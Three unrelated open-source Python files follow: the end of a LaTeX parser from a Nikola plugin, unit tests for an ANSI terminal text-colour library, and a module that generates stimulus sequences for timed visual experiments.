raise ParseError(self.tokens, "Cannot interpret symbol '{0}'!".format(code), filename=self.filename)
return tree.WordPart(chr(code))
def __parse_words(self, math_mode, delimiter, accept_unknown_commands=False, table_mode=False, url_mode=False):
current_words = tree.Words()
current_word = None
table_ended = False
def add_to_current_word(part):
nonlocal current_word
if current_word is None:
current_word = tree.Word()
current_word.parts.append(part)
while self.tokens.has_current():
token = self.tokens.current_type()
if token == tokenizer.Token.Whitespace:
# Flush word
if current_word is not None:
current_words.words.append(current_word)
current_word = None
else:
current_words.words.append(tree.Word())
self.tokens.skip_current()
elif token == tokenizer.Token.NonbreakableWhitespace:
add_to_current_word(tree.WordPart(" "))
self.tokens.skip_current()
elif token == tokenizer.Token.Comment:
add_to_current_word(tree.Comment(self.tokens.current_value()))
self.tokens.skip_current()
elif token == tokenizer.Token.Text:
add_to_current_word(tree.WordPart(self.__postprocess_text(self.tokens.current_value())))
self.tokens.skip_current()
elif token == tokenizer.Token.EscapedText:
add_to_current_word(tree.WordPart(self.tokens.current_value(), escaped=True))
self.tokens.skip_current()
elif token == tokenizer.Token.Command:
level = _Level.get_level(self.tokens.current_value())
if level != _Level.NO_LEVEL:
raise ParseError(self.tokens, "Cannot process level-changing command during words parsing!", filename=self.filename)
else:
# math_mode: "ignore" unknown commands and put as text into stream
command = self.__parse_command(math_mode or accept_unknown_commands, math_mode=math_mode)
form = self.__get_formatting(command)
if form is not None:
add_to_current_word(form)
if len(command) == 1:
if command[0] == "(":
formula = self.__read_formula((")",))
add_to_current_word(tree.Formula(formula))
elif command[0] == "[":
raise ParseError(self.tokens, "Display mode math not allowed during word parsing!", filename=self.filename)
elif command[0] == ")" or command[0] == "]":
raise ParseError(self.tokens, "Unexpected end of math mode!", filename=self.filename)
else:
text = "\\{0}".format(command[0])
if len(command) == 2:
text += "{{{0}}}".format(command[1].strip())
add_to_current_word(tree.WordPart(text + " "))
elif command[0] == "code":
add_to_current_word(self.__get_inline_code(command[1][0]))
elif command[0] == 'href':
add_to_current_word(tree.Link(command[1][0].recombine_as_text(reescape=False), link_text=command[1][1]))
elif command[0] == 'url':
add_to_current_word(tree.Link(command[1][0].recombine_as_text(reescape=False)))
elif command[0] == 'symbol':
add_to_current_word(self.__parse_symbol(command[1][0].recombine_as_text()))
elif command[0] == 'ref':
add_to_current_word(tree.Reference(command[1][0].recombine_as_text(), command[1][1]))
elif command[0] == 'includegraphics':
if math_mode:
raise ParseError(self.tokens, "\\includegraphics not allowed in math mode!", filename=self.filename)
add_to_current_word(self.__get_includegraphics(command))
elif command[0] == 'begin' and command[1] == 'tikzpicture':
add_to_current_word(self.__get_tikz_picture(command))
elif command[0] == 'begin' and command[1] == 'pstricks':
add_to_current_word(self.__get_PSTricks_picture(command))
elif command[0] == 'foreignlanguage':
add_to_current_word(self.__add_language(command[1][1], command[1][0].recombine_as_text()))
elif command[0] in _replacement_commands:
add_to_current_word(tree.WordPart(_replacement_commands[command[0]]))
else:
if len(command) == 2:
raise ParseError(self.tokens, "Command '{}' not allowed during words parsing!".format(command[0]), filename=self.filename)
elif command[0] == 'end':
if command[1] == 'tabular' and table_mode:
table_ended = True
break
raise ParseError(self.tokens, "Unexpected end of environment '{}'!".format(command[1]), filename=self.filename)
else:
raise ParseError(self.tokens, "Environment '{}' not allowed during words parsing!".format(command[1]), filename=self.filename)
elif token == tokenizer.Token.InlineFormulaDelimiter:
if math_mode:
raise ParseError(self.tokens, "Cannot start another formula inside an formula!", filename=self.filename)
self.tokens.skip_current()
formula = self.__read_formula(tokenizer.Token.InlineFormulaDelimiter)
add_to_current_word(tree.Formula(formula))
elif token == tokenizer.Token.DisplayFormulaDelimiter:
raise ParseError(self.tokens, "Cannot process display-style formulae during words parsing!", filename=self.filename)
elif token == tokenizer.Token.CurlyBraketOpen:
self.tokens.skip_current()
add_to_current_word(self.__parse_words(math_mode=math_mode, delimiter=tokenizer.Token.CurlyBraketClose, accept_unknown_commands=accept_unknown_commands, url_mode=url_mode))
self.__expect(tokenizer.Token.CurlyBraketClose)
elif token == delimiter:
break
elif token == tokenizer.Token.CurlyBraketClose:
raise ParseError(self.tokens, "Unexpected closing curly braket during words parsing!", filename=self.filename)
elif token == tokenizer.Token.SquareBraketOpen:
add_to_current_word(tree.WordPart("["))
self.tokens.skip_current()
elif token == tokenizer.Token.SquareBraketClose:
add_to_current_word(tree.WordPart("]"))
self.tokens.skip_current()
elif token == tokenizer.Token.DoubleNewLine:
raise ParseError(self.tokens, "Cannot process paragraph break during words parsing!", filename=self.filename)
elif table_mode and token in (tokenizer.Token.ForcedLineBreak, tokenizer.Token.TableColumnDelimiter):
break
elif math_mode and token in (tokenizer.Token.ForcedLineBreak, tokenizer.Token.TableColumnDelimiter):
self.tokens.skip_current() # ignore
elif url_mode and token == tokenizer.Token.TableColumnDelimiter:
add_to_current_word(tree.WordPart("&", escaped=True))
self.tokens.skip_current()
else:
raise ParseError(self.tokens, "Cannot handle token {}!".format(token), filename=self.filename)
# Flush word
if current_word is not None:
current_words.words.append(current_word)
current_word = None
else:
if len(current_words.words) > 0 and len(current_words.words[-1].parts) > 0:
current_words.words.append(tree.Word())
if table_mode:
return current_words, table_ended
else:
return current_words
def __read_formula(self, delimiter):
start = self.tokens.current_indices()[0]
delimitedByEnvironmentEnd = (type(delimiter) == tuple)
while self.tokens.has_current():
stop = self.tokens.current_indices()[0]
token = self.tokens.current_type()
if not delimitedByEnvironmentEnd and token == delimiter:
self.__expect(delimiter)
break
if token == tokenizer.Token.Command and delimitedByEnvironmentEnd:
if len(delimiter) > 1 and self.tokens.current_value() == "end":
command = self.__parse_command(True, math_mode=True)
if len(command) != 1:
if command[1] == delimiter[1]:
break
elif len(delimiter) == 1 and self.tokens.current_value() == delimiter[0]:
self.tokens.skip_current()
break
else:
self.tokens.skip_current()
elif token == tokenizer.Token.CurlyBraketOpen:
self.tokens.skip_current()
self.__parse_words(math_mode=True, delimiter=tokenizer.Token.CurlyBraketClose)
self.__expect(tokenizer.Token.CurlyBraketClose)
elif token == tokenizer.Token.CurlyBraketClose:
raise ParseError(self.tokens, "Unexpected closing curly braket during formula!", filename=self.filename)
else:
self.tokens.skip_current()
return self.tokens.get_substring(start, stop).strip()
def __expect_empty__parse_block_result(self, res):
if res is not None:
if len(res) == 3:
raise ParseError(self.tokens, "Unexpected \\end{{{0}}} in block!".format(res[1]), filename=self.filename)
else:
raise ParseError(self.tokens, "Unexpected \\{0} in block!".format(res[0]), filename=self.filename)
def __get_picturegroup(self, command):
result = tree.PictureGroup()
while self.tokens.has_current():
token = self.tokens.current_type()
if token == tokenizer.Token.Command:
value = self.tokens.current_value()
if value == 'end':
command = self.__parse_command(False)
if command[1] != 'picturegroup':
raise ParseError(self.tokens, "Unexpected \\end{{{0}}} in picture group!".format(command[1]), filename=self.filename)
return result
elif value == 'picture':
self.tokens.skip_current()
command = self.__parse_command_impl('picture', None, False, True, 2, [])
result.pictures.append((command[1][0], command[1][1]))
else:
raise ParseError(self.tokens, "Unexpected \\{0} in picture group!".format(value), filename=self.filename)
else:
raise ParseError(self.tokens, "Unexpected token {0} in picture group!".format(token), filename=self.filename)
def __get_formulalist(self, command):
result = tree.FormulaList()
while self.tokens.has_current():
token = self.tokens.current_type()
if token == tokenizer.Token.Command:
value = self.tokens.current_value()
if value == 'end':
command = self.__parse_command(False)
if command[1] != 'formulalist':
raise ParseError(self.tokens, "Unexpected \\end{{{0}}} in formula list!".format(command[1]), filename=self.filename)
return result
elif value == 'formula':
self.tokens.skip_current()
command = self.__parse_command_impl('formula', None, False, True, 1, [])
result.formulae.append(command[1][0])
else:
raise ParseError(self.tokens, "Unexpected \\{0} in formula list!".format(value), filename=self.filename)
else:
raise ParseError(self.tokens, "Unexpected token {0} in formula list!".format(token), filename=self.filename)
def __parse_tabular_alignment(self, alignment):
result = []
left_border = False
for c in alignment.recombine_as_text():
if c == '|':
if len(result) > 0:
result[-1].right_border = True
else:
left_border = True
elif c == 'l':
result.append(tree.TabularAlign(tree.TabularAlignEnum.Left, left_border=left_border))
left_border = False
elif c == 'c':
result.append(tree.TabularAlign(tree.TabularAlignEnum.Center, left_border=left_border))
left_border = False
elif c == 'r':
result.append(tree.TabularAlign(tree.TabularAlignEnum.Right, left_border=left_border))
left_border = False
elif c == ' ':
pass # ignore
else:
raise ParseError(self.tokens, "Unknown tabular alignment character '{0}'!".format(c), filename=self.filename)
return result
def __parse_tabular_lines(self):
result = []
while self.tokens.has_current():
token = self.tokens.current_type()
if token == tokenizer.Token.Command:
value = self.tokens.current_value()
if value == 'hline':
self.tokens.skip_current()
result.append(None)
elif value == 'cline':
command = self.__parse_command(False)
value = command[1][0].recombine_as_text()
value_split = value.split('-')
if len(value_split) != 2:
raise ParseError(self.tokens, "Cannot interpret '{}' as column range!".format(value), filename=self.filename)
start = int(value_split[0]) if value_split[0] else None
end = int(value_split[1]) if value_split[1] else None
if start is None and end is None:
result.append(None)
else:
result.append((start, end))
else:
break
elif token == tokenizer.Token.Whitespace:
self.tokens.skip_current() # ignore
elif token == tokenizer.Token.Comment:
self.tokens.skip_current() # ignore
else:
break
return result
def __parse_block(self, destination_block, block_level, current_Level, insideEnv):
# Read blocks into higher-level block
current_block = None
current_words = None
current_word = None
def flush_word():
nonlocal current_word, current_words
# Flush word
if current_word is not None:
if current_words is None:
current_words = tree.Words()
current_words.words.append(current_word)
current_word = None
def flush_words():
nonlocal current_words, current_block
flush_word()
# Flush words
if current_words is not None:
if current_block is None:
current_block = tree.Block()
current_block.elements.append(current_words)
current_words = None
def flush_block():
nonlocal current_block
flush_words()
# Flush block
if current_block is not None:
destination_block.elements.append(current_block)
current_block = None
def add_to_current_word(part):
nonlocal current_word
if current_word is None:
current_word = tree.Word()
current_word.parts.append(part)
def add_to_current_block(part):
nonlocal current_words, current_block
flush_words()
if current_block is None:
current_block = tree.Block()
current_block.elements.append(part)
while self.tokens.has_current():
token = self.tokens.current_type()
# print("Current block: " + str(current_block))
# print("Current words: " + str(current_words))
# print("Current word: " + str(current_word))
# print(str(token))
if token == tokenizer.Token.Whitespace:
flush_word()
self.tokens.skip_current()
elif token == tokenizer.Token.NonbreakableWhitespace:
add_to_current_word(tree.WordPart(" "))
self.tokens.skip_current()
elif token == tokenizer.Token.Comment:
add_to_current_word(tree.Comment(self.tokens.current_value()))
self.tokens.skip_current()
elif token == tokenizer.Token.Text:
add_to_current_word(tree.WordPart(self.__postprocess_text(self.tokens.current_value())))
self.tokens.skip_current()
elif token == tokenizer.Token.EscapedText:
add_to_current_word(tree.WordPart(self.tokens.current_value(), escaped=True))
self.tokens.skip_current()
elif token == tokenizer.Token.Command:
level = _Level.get_level(self.tokens.current_value())
if level != _Level.NO_LEVEL:
if insideEnv:
raise ParseError(self.tokens, "Cannot start new block level inside an environment!", filename=self.filename)
# If we want to start a level which is as high as the block level or higher, we need to quit this function first
if level <= block_level:
break
# Now compare the level to the current level
if level > current_Level:
flush_words()
# add as child
command = self.__parse_command(False)
new_block = _Level.create_object(level, command[1][0])
res = self.__parse_block(new_block, level, level, False)
self.__expect_empty__parse_block_result(res)
if current_block is None:
current_block = tree.Block()
current_block.elements.append(new_block)
else:
flush_block()
# Add on same level
command = self.__parse_command(False)
new_block = _Level.create_object(level, command[1][0])
res = self.__parse_block(new_block, level, level, False)
self.__expect_empty__parse_block_result(res)
destination_block.elements.append(new_block)
current_Level = level
else:
if self.tokens.current_value() == "(":
self.tokens.skip_current()
formula = self.__read_formula((")",))
add_to_current_word(tree.Formula(formula))
elif self.tokens.current_value() == "[":
self.tokens.skip_current()
self.tokens.skip_current()
formula = self.__read_formula(("]",))
add_to_current_block(tree.DisplayFormula(formula))
elif self.tokens.current_value() == ")" or self.tokens.current_value() == "]":
raise ParseError(self.tokens, "Unexpected end of math mode!", filename=self.filename)
else:
command = self.__parse_command(False)
form = self.__get_formatting(command)
if form is not None:
add_to_current_word(form)
elif len(command) == 3:
# environment
if command[0] == "end":
flush_block()
return command
if command[1] in {"definition", "definitions", "lemma", "proposition", "theorem", "corollary", "example", "examples", "remark", "remarks", "proof"}:
# Add on same level
new_block = tree.TheoremEnvironment(command[1])
if command[2][0] is not None:
new_block.optional_title = command[2][0]
res = self.__parse_block(new_block, current_Level, current_Level, False)
if res is None:
raise ParseError(self.tokens, "Unexpected end of '{}' environment!".format(command[1]), filename=self.filename)
if len(res) != 3:
self.__expect_empty__parse_block_result(res)
if res[1] != command[1]:
raise ParseError(self.tokens, "{0} paired with {1}!".format(self.__command_name(command), self.__command_name(res)), filename=self.filename)
add_to_current_block(new_block)
elif command[1] in ['blockquote', 'center']:
# Add on same level
new_block = tree.SpecialBlock(command[1])
res = self.__parse_block(new_block, current_Level, current_Level, False)
if res is None:
raise ParseError(self.tokens, "Unexpected end of '{}' environment!".format(command[1]), filename=self.filename)
if len(res) != 3:
self.__expect_empty__parse_block_result(res)
if res[1] != command[1]:
raise ParseError(self.tokens, "{0} paired with {1}!".format(self.__command_name(command), self.__command_name(res)), filename=self.filename)
add_to_current_block(new_block)
elif command[1] in {"align*", "align"}:
formula = self.__read_formula(command)
# Add display formula
add_to_current_block(tree.AlignFormula(formula))
elif command[1] in {"itemize", "enumerate"}:
if command[1] == "itemize":
enumType = "ul"
else:
enumType = "ol"
enum = tree.Enumeration(enumType)
# Parse first "item"
item_command = self.__parse_command(False)
if len(item_command) != 2 or item_command[0] != 'item':
raise ParseError(self.tokens, "Expected \\item, but got {}".format(self.__command_name(item_command)), filename=self.filename)
while True:
new_block = tree.Block()
res = self.__parse_block(new_block, _Level.Text, _Level.Text, False)
if len(new_block.elements) == 1:
enum.elements.append(new_block.elements[0])
else:
enum.elements.append(new_block)
# Check for result
if res is None:
raise ParseError(self.tokens, "Unexpected end of '{}' environment!".format(command[1]), filename=self.filename)
if len(res) == 2 and res[0] == "item":
continue
if len(res) == 3 and res[1] == command[1] and res[0] == 'end':
break
if len(res) == 3 and res[1] != command[1]:
raise ParseError(self.tokens, "{0} paired with {1}!".format(self.__command_name(command), self.__command_name(res)), filename=self.filename)
self.__expect_empty__parse_block_result(res)
add_to_current_block(enum)
elif command[1] == "codelisting":
flush_block()
# Extract code
start = self.tokens.current_indices()[0]
while self.tokens.has_current():
if self.tokens.current() == (tokenizer.Token.Command, "end") and self.tokens.peek_type(1) == tokenizer.Token.CurlyBraketOpen and self.tokens.peek(2) == (tokenizer.Token.Text, "codelisting") and self.tokens.peek_type(3) == tokenizer.Token.CurlyBraketClose:
stop = self.tokens.current_indices()[0]
self.tokens.skip_current(4)
break
self.tokens.skip_current()
destination_block.elements.append(tree.CodeBlock(command[2][0].recombine_as_text(), self.tokens.get_substring(start, stop).strip(" ").strip("\n")))
elif command[1] == 'tikzpicture':
add_to_current_word(self.__get_tikz_picture(command))
elif command[1] == 'pstricks':
add_to_current_word(self.__get_PSTricks_picture(command))
elif command[1] == 'picturegroup':
add_to_current_block(self.__get_picturegroup(command))
elif command[1] == 'formulalist':
add_to_current_block(self.__get_formulalist(command))
elif command[1] == 'tabular':
tabular = tree.Tabular(self.__parse_tabular_alignment(command[2][0]))
tabular.add_lines(self.__parse_tabular_lines())
while True:
cell, table_ended = self.__parse_words(math_mode=False, delimiter=None, table_mode=True)
tabular.add_cell(cell)
if table_ended:
break
token = self.tokens.current_type()
if token == tokenizer.Token.ForcedLineBreak:
tabular.next_row()
self.tokens.skip_current()
tabular.add_lines(self.__parse_tabular_lines())
elif token == tokenizer.Token.TableColumnDelimiter:
self.tokens.skip_current()
else:
raise ParseError(self.tokens, "Unexpected {0} token in tabular environment!".format(token), filename=self.filename)
tabular.end_of_table_parsing()
add_to_current_word(tabular)
else:
raise ParseError(self.tokens, "Unknown environment start {}!".format(self.__command_name(command)), filename=self.filename)
else:
# command
if command[0] == 'newpar':
flush_words()
elif command[0] == 'item':
flush_block()
return command
elif command[0] == 'noindent':
pass # ignore
elif command[0] == 'setlength':
pass # ignore
elif command[0] == "code":
add_to_current_word(self.__get_inline_code(command[1][0]))
elif command[0] == 'href':
add_to_current_word(tree.Link(command[1][0].recombine_as_text(reescape=False), link_text=command[1][1]))
elif command[0] == 'url':
add_to_current_word(tree.Link(command[1][0].recombine_as_text(reescape=False)))
elif command[0] == 'symbol':
add_to_current_word(self.__parse_symbol(command[1][0].recombine_as_text()))
elif command[0] == 'ref':
add_to_current_word(tree.Reference(command[1][0].recombine_as_text(), command[1][1]))
elif command[0] == 'qed':
if isinstance(destination_block, tree.TheoremEnvironment):
destination_block.qed = True
elif command[0] == 'label':
destination_block.labels.append(command[1][0].recombine_as_text())
elif command[0] == 'includegraphics':
add_to_current_word(self.__get_includegraphics(command))
elif command[0] == 'foreignlanguage':
add_to_current_word(self.__add_language(command[1][1], command[1][0].recombine_as_text()))
elif command[0] in _replacement_commands:
add_to_current_word(tree.WordPart(_replacement_commands[command[0]]))
else:
raise ParseError(self.tokens, "Unsupported command '{}'!".format(command[0]), filename=self.filename)
elif token == tokenizer.Token.InlineFormulaDelimiter:
self.tokens.skip_current()
formula = self.__read_formula(tokenizer.Token.InlineFormulaDelimiter)
add_to_current_word(tree.Formula(formula))
elif token == tokenizer.Token.DisplayFormulaDelimiter:
self.tokens.skip_current()
formula = self.__read_formula(tokenizer.Token.DisplayFormulaDelimiter)
add_to_current_block(tree.DisplayFormula(formula))
elif token == tokenizer.Token.CurlyBraketOpen:
self.tokens.skip_current()
add_to_current_word(self.__parse_words(math_mode=False, delimiter=tokenizer.Token.CurlyBraketClose))
self.__expect(tokenizer.Token.CurlyBraketClose)
elif token == tokenizer.Token.CurlyBraketClose:
raise ParseError(self.tokens, "Unexpected closing curly braket!", filename=self.filename)
elif token == tokenizer.Token.SquareBraketOpen:
add_to_current_word(tree.WordPart("["))
self.tokens.skip_current()
elif token == tokenizer.Token.SquareBraketClose:
add_to_current_word(tree.WordPart("]"))
self.tokens.skip_current()
elif token == tokenizer.Token.DoubleNewLine:
flush_words()
self.tokens.skip_current()
else:
raise ParseError(self.tokens, "Cannot handle token {}!".format(token), filename=self.filename)
flush_block()
return None
def parse(self):
"""Do parsing."""
block = tree.Block()
res = self.__parse_block(block, _Level.Everything, _Level.Text, False)
self.__expect_empty__parse_block_result(res)
block = self.__flatten(block)
return block
def parse(input, parsing_environment, filename=None):
"""Create parser object and execute parsing.
``input``: unicode input string;
``parsing_environment``: instance of ``ParsingEnvironment``;
``filename``: optional filename to be used in error messages.
"""
parser = Parser(input, parsing_environment, filename=filename)
return parser.parse()
| getnikola/plugins | v7/latex/latex/parser.py | Python | mit | 59,047 |
# -*- coding: utf-8 -*-
import unittest
try:
from terminal_text_color import *
except ImportError:
import os,sys
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))
from terminal_text_color import TextColor
class TexColorTestStyle(unittest.TestCase):
def testStyleDefault(self):
tc = TextColor()
texto = "Hola"
textoesperado = '\x1b[0;39;49m'+texto+'\x1b[0m'
self.assertEqual(tc.default(texto), textoesperado)
def testStyleBold(self):
tc = TextColor()
texto = "Hola"
textoesperado = '\x1b[1;39;49m'+texto+'\x1b[0m'
self.assertEqual(tc.bold(texto), textoesperado)
def testStyleOpaque(self):
tc = TextColor()
texto = "Hola"
textoesperado = '\x1b[2;39;49m'+texto+'\x1b[0m'
self.assertEqual(tc.opaque(texto), textoesperado)
def testStyleItalic(self):
tc = TextColor()
texto = "Hola"
textoesperado = '\x1b[3;39;49m'+texto+'\x1b[0m'
self.assertEqual(tc.italic(texto), textoesperado)
def testStyleUnderline(self):
tc = TextColor()
texto = "Hola"
textoesperado = '\x1b[4;39;49m'+texto+'\x1b[0m'
self.assertEqual(tc.underline(texto), textoesperado)
def testStyleCrossedout(self):
tc = TextColor()
texto = "Hola"
textoesperado = '\x1b[9;39;49m'+texto+'\x1b[0m'
self.assertEqual(tc.crossedout(texto), textoesperado)
class TextColorTestColor(unittest.TestCase):
"""docstring for TextColorTestColor"""
def testColorGrey (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;30;49m"+texto+"\x1b[0m"
self.assertEqual(tc.default_grey(texto), textoesperado)
def testColorRed (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;31;49m"+texto+"\x1b[0m"
self.assertEqual(tc.default_red(texto), textoesperado)
def testColorGreen (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;32;49m"+texto+"\x1b[0m"
self.assertEqual(tc.default_green(texto), textoesperado)
def testColorYellow (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;33;49m"+texto+"\x1b[0m"
self.assertEqual(tc.default_yellow(texto), textoesperado)
def testColorBlue (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;34;49m"+texto+"\x1b[0m"
self.assertEqual(tc.default_blue(texto), textoesperado)
def testColorMagenta (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;35;49m"+texto+"\x1b[0m"
self.assertEqual(tc.default_magenta(texto), textoesperado)
def testColorCyan (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;36;49m"+texto+"\x1b[0m"
self.assertEqual(tc.default_cyan(texto), textoesperado)
def testColorWhite (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;37;49m"+texto+"\x1b[0m"
self.assertEqual(tc.default_white(texto), textoesperado)
class TextColorTestBackground(unittest.TestCase):
"""docstring for TextColorTestColor"""
def testBackgroundGrey (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;39;40m"+texto+"\x1b[0m"
self.assertEqual(tc.default_default_grey(texto), textoesperado)
def testBackgroundRed (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;39;41m"+texto+"\x1b[0m"
self.assertEqual(tc.default_default_red(texto), textoesperado)
def testBackgroundGreen (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;39;42m"+texto+"\x1b[0m"
self.assertEqual(tc.default_default_green(texto), textoesperado)
def testBackgroundYellow (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;39;43m"+texto+"\x1b[0m"
self.assertEqual(tc.default_default_yellow(texto), textoesperado)
def testBackgroundBlue (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;39;44m"+texto+"\x1b[0m"
self.assertEqual(tc.default_default_blue(texto), textoesperado)
def testBackgroundMagenta (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;39;45m"+texto+"\x1b[0m"
self.assertEqual(tc.default_default_magenta(texto), textoesperado)
def testBackgroundCyan (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;39;46m"+texto+"\x1b[0m"
self.assertEqual(tc.default_default_cyan(texto), textoesperado)
def testBackgroundWhite (self):
tc = TextColor()
texto = "Hola"
textoesperado = "\x1b[0;39;47m"+texto+"\x1b[0m"
self.assertEqual(tc.default_default_white(texto), textoesperado)
if __name__ == '__main__':
unittest.main() | ElMijo/terminal-text-color-py | tests/text_color_test.py | Python | mit | 5,022 |
# TODO :
# [X] - load sequence from file
# [] - use of the event sequence
# [] - noise codes stimulus
# ensure the divisions produce float if needed
from random import shuffle, randint, random
from math import ceil, cos, sin, pi
class StimSeq :
stimSeq = None # [ nEvent x nSymb ] stimulus code for each time point for each stimulus
stimTime_ms = None # time stim i ends, i.e. stimulus i is on screen from stimTime_ms[i-1]-stimTime_ms[i]
eventSeq = None # events to send at each stimulus point
def __init__(self,st=None,ss=None,es=None):
self.stimSeq = ss
self.stimTime_ms = st
self.eventSeq = es
def __str__(self):
res = "#stimTimes: ";
if not self.stimTime_ms is None:
res += "(1," + str(len(self.stimTime_ms)) + ")\n"
for i in range(0,len(self.stimTime_ms)-1):
res += str(self.stimTime_ms[i]) + " "
res+= str(self.stimTime_ms[-1]) + "\n"
else:
res+= "<null>\n"
res+= "\n\n"
res += "#stimSeq : "
if not self.stimSeq is None:
res += "(" + str(len(self.stimSeq[0])) + "," + str(len(self.stimSeq)) + ")\n"
for j in range(0,len(self.stimSeq[0])):
for i in range(len(self.stimSeq)-1):
res += str(self.stimSeq[i][j]) + " "
res+= str(self.stimSeq[-1][j]) + "\n"
else:
res+= "<null>\n"
res+="\n\n"
return res
@staticmethod
def readArray(f,width=-1):
array=[]
nEmpty=0
for line in f:
line = line.strip();
if len(line)==0 :
nEmpty += 1
if nEmpty>1 and len(array)>0 : break # double empty means end-of-array
else: continue
elif line[0]=="#" : continue # comment line
cols = line.split();
if width<0 : width=len(line)
elif width>0 and not len(cols) == width :
raise Exception
cols = [ float(c) for c in cols ] # convert string to numeric
array.append(cols) # add to the stimSeq
return array
@staticmethod
def fromString(fname):
f=open(fname,'r') if type(fname) is str else fname
st=StimSeq.readArray(f) # read the stim times
if len(st)>1 : raise Exception
else: st=st[0] # un-nest
ss=StimSeq.readArray(f,len(st)) # read stim-seq - check same length
# transpose ss to have time in the major dimension
ss2=[[None]*len(ss)]*len(ss[0]);
for s in range(len(ss)):
for t in range(len(ss[s])):
ss2[t][s]=ss[s][t]
return StimSeq(st,ss2)
@staticmethod
def mkStimSeqScan(nSymb, seqDuration, isi):
nEvent = int(seqDuration/isi) + 1
stimTime_ms = [ (ei+1)*1000.0*isi for ei in range(nEvent) ]
stimSeq = [[None]*nSymb for i in range(nEvent)]
for ei in range(nEvent):
stimSeq[ei][ei%nSymb]=1
return StimSeq(stimTime_ms,stimSeq)
@staticmethod
def mkStimSeqRand(nSymb, seqDuration, isi):
perm = [i for i in range(nSymb)] # pre-alloc order for later shuffle
nEvent = int(seqDuration/isi) + 1
stimTime_ms = [ (ei+1)*1000.0*isi for ei in range(nEvent) ]
stimSeq = [[None]*nSymb for i in range(nEvent)]
for ri in range(0,nEvent,nSymb):
shuffle(perm)
for ei in range(nSymb):
if ri+ei < len(stimSeq): # don't go past the end
stimSeq[ri+ei][perm[ei]]=1
return StimSeq(stimTime_ms,stimSeq)
@staticmethod
def mkStimSeqOddball(nSymb, seqDuration, isi, tti=None, distractor=False):
# TODO: [] add check to minimize cross-talk with other symbols
nEvent = int(seqDuration/isi) + 1
tti_ev = tti/isi if not tti is None else nSymb # ave num events between targets
stimTime_ms = [ (ei+1)*1000.0*isi for ei in range(nEvent) ]
stimSeq = [[None]*nSymb for i in range(nEvent)]
for ei in range(nSymb):
si= 1+random()*tti_ev # last stimulus time
for ri in range(0,nEvent):
stimSeq[ri][ei] = 0
if ri==int(si) :
stimSeq[ri][ei] = 1
si = si + tti_ev*(.5 + random()) # step [.5-1.5]*tti
return StimSeq(stimTime_ms,stimSeq)
@staticmethod
def mkStimSeqNoise(nSymb, seqDuration, isi, weight=.5):
nEvent = int(seqDuration/isi) + 1
stimTime_ms = [ (ei+1)*1000.0*isi for ei in range(nEvent) ]
stimSeq = [[None]*nSymb for i in range(nEvent)]
for ei in range(nEvent):
for si in range(nSymb):
if random() > weight :
stimSeq[ei][si]=1
return StimSeq(stimTime_ms,stimSeq)
@staticmethod
def mkStimSeqSSEP(nSymb, seqDuration, isi, periods=None, smooth=False):
# N.B. Periods is in *seconds*
nEvent = int(seqDuration/isi) + 1
stimTime_ms = [ (ei+1)*1000.0*isi for ei in range(nEvent) ]
stimSeq = [[None]*nSymb for i in range(nEvent)]
for si in range(nSymb):
if not type(periods[si]) is list: # ensure periods has duration and phase
periods[si] = [periods[si],0]
for ei in range(nEvent):
# N.B. include slight phase offset to prevent value being exactly==0
stimSeq[ei][si]=cos((stimTime_ms[ei]/1000.0+.0001+periods[si][1])/periods[si][0]*2*pi);
if smooth :
stimSeq[ei][si]=(stimSeq[ei][si]+1)/2; # ensure all positive values in range 0-1
else:
stimSeq[ei][si]=1 if stimSeq[ei][si]>0 else 0
return StimSeq(stimTime_ms,stimSeq)
@staticmethod
def mkStimSeqInterval(nSymb, seqDuration, isi, periods=None):
# N.B. Periods is in *seconds*
nEvent = int(seqDuration/isi) + 1
stimTime_ms = [ (ei+1)*1000.0*isi for ei in range(nEvent) ]
stimSeq = [[None]*nSymb for i in range(nEvent)]
for si in range(nSymb):
for ii in range(0,int(seqDuration/periods[si])+1):
ei = int(round(ii*periods[si]/isi)) # convert to event number
if ei < nEvent: stimSeq[ei][si]=1
return StimSeq(stimTime_ms,stimSeq)
def phaseShiftKey(self,speedup=False):
''' Convert a normal encoded stim sequence into a phase-shift-keyed version where
0 -> 01, and 1 -> 10.
speedup - if true then keep duration the same but half the isi, false = double duration.'''
if speedup:
st=[]
for i in range(len(self.stimTime_ms)-1): # insert new point between existing ones
st += [self.stimTime_ms[i], self.stimTime_ms[i]+(self.stimTime_ms[i+1]-self.stimTime_ms[i])//2]
st += [self.stimTime_ms[-1],
self.stimTime_ms[-1]+(self.stimTime_ms[-1]-self.stimTime_ms[-2])//2]
else:
# start again 1 isi after the end
offset = self.stimTime_ms[-1]+self.stimTime_ms[1]-self.stimTime_ms[0]
st=self.stimTime_ms + [i+offset for i in self.stimTime_ms]
self.stimTime_ms=st
ss = [[None]*len(self.stimSeq[0]) for i in range(len(self.stimSeq)*2)]
for ei in range(len(self.stimSeq)):
ss[ei*2] = self.stimSeq[ei]
ss[ei*2+1] = [0 if ssei==1 else 1 for ssei in self.stimSeq[ei]]
self.stimSeq=ss
return self
# testcase code
if __name__ == "__main__":
print(("Noise:" + str(stimseq.StimSeq.mkStimSeqNoise(4,3,.1))))
print(("Scan: " + str(stimseq.StimSeq.mkStimSeqScan(4,3,.1))))
print(("Rand: " + str(stimseq.StimSeq.mkStimSeqRand(4,3,.1))))
print(("Odd: " + str(stimseq.StimSeq.mkStimSeqOddball(1,3,.4))))
print(("SSEP: " + str(stimseq.StimSeq.mkStimSeqSSEP(4,3,.1,[x*.1 for x in [2,3,4,5]]))))
